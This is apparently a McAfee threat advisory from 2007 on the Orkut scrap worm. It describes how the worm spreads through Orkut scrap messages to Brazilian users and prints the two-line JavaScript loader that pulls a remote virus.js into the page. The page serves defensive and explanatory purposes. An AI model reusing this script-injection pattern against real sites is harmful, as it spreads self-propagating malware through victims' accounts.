McAfee > Theat Center > Virus Detail Page

Overview

-- Update December 19, 2007 --
The risk assessment of this threat has been updated to Low-Profiled due to media attention at:
http://www.pcworld.com/article/id,140653-c,worms/article.html

--

This is a virus detection. Viruses are programs that self-replicate recursively, meaning that infected systems spread the virus to other systems, which then propagate the virus further. While many viruses contain a destructive payload, it's quite common for viruses to do nothing more than spread from one system to another.

This virus will affect users of the social network Orkut.

Characteristics

-- Update December 19, 2007 --
The risk assessment of this threat has been updated to Low-Profiled due to media attention at:
http://www.pcworld.com/article/id,140653-c,worms/article.html

--

This virus will add the user on a community called "Infectados pelo Virus Orkut", which means "Infected by the Orkut Virus" and start to send scraps (messages on orkut model) to the friends of the infected user.

This is done by adding a javascript file called virus.js on the scrap message:

script=document.createElement('script');
script.src='http://[REMOVED]/virusdoorkut/[REMOVED]/virus.js';

Symptoms

The infected user will start to send scraps (messages on Orkut model) to his friends. The scrap will arrive by email to the friend with some portuguese messages like:

"2008 vem ai... que ele comece mto bem para vc", which means "2008 is arriving, I hope that it starts quite will for you", or

"Boas Festas de final de Ano!", which means "Have a nice new years party!".

Once the user received the email and checks the scrap, the message will contain a javascript, called virus.js which will execute and start the sending scraps process and add the infected user to the "Infectados pelo Virus Orkut" community.

This is specially target for Brazilian users, the majority of the users from the Google social network, but other users may be affected by checking these scraps.

Method of Infection

The basic Method of infection is:
- the user receives an email telling that they got a new scrap...
- the user checks orkut's scrapbook...
- by just checking the scrap book they became infected since the message has a link to a remote malicious .js file (virus.js) .

Removal

A combination of the latest DATs and the Engine will be able to detect and remove this threat. AVERT recommends users not to trust seemingly familiar or safe file icons, particularly when received via P2P clients, IRC, email or other media where users can share files.

Additional Windows ME/XP removal considerations

Variants

Variants

N/A

All Information

Overview -

-- Update December 19, 2007 --
The risk assessment of this threat has been updated to Low-Profiled due to media attention at:
http://www.pcworld.com/article/id,140653-c,worms/article.html

--

This is a virus detection. Viruses are programs that self-replicate recursively, meaning that infected systems spread the virus to other systems, which then propagate the virus further. While many viruses contain a destructive payload, it's quite common for viruses to do nothing more than spread from one system to another.

This virus will affect users of the social network Orkut.

Characteristics

Characteristics -

-- Update December 19, 2007 --
The risk assessment of this threat has been updated to Low-Profiled due to media attention at:
http://www.pcworld.com/article/id,140653-c,worms/article.html

--

This virus will add the user on a community called "Infectados pelo Virus Orkut", which means "Infected by the Orkut Virus" and start to send scraps (messages on orkut model) to the friends of the infected user.

This is done by adding a javascript file called virus.js on the scrap message:

script=document.createElement('script');
script.src='http://[REMOVED]/virusdoorkut/[REMOVED]/virus.js';

Symptoms

Symptoms -

The infected user will start to send scraps (messages on Orkut model) to his friends. The scrap will arrive by email to the friend with some portuguese messages like:

"2008 vem ai... que ele comece mto bem para vc", which means "2008 is arriving, I hope that it starts quite will for you", or

"Boas Festas de final de Ano!", which means "Have a nice new years party!".

Once the user received the email and checks the scrap, the message will contain a javascript, called virus.js which will execute and start the sending scraps process and add the infected user to the "Infectados pelo Virus Orkut" community.

This is specially target for Brazilian users, the majority of the users from the Google social network, but other users may be affected by checking these scraps.

Method of Infection

Method of Infection -

The basic Method of infection is:
- the user receives an email telling that they got a new scrap...
- the user checks orkut's scrapbook...
- by just checking the scrap book they became infected since the message has a link to a remote malicious .js file (virus.js) .

Removal -

Removal -

A combination of the latest DATs and the Engine will be able to detect and remove this threat. AVERT recommends users not to trust seemingly familiar or safe file icons, particularly when received via P2P clients, IRC, email or other media where users can share files.

Additional Windows ME/XP removal considerations

Variants

Variants -

N/A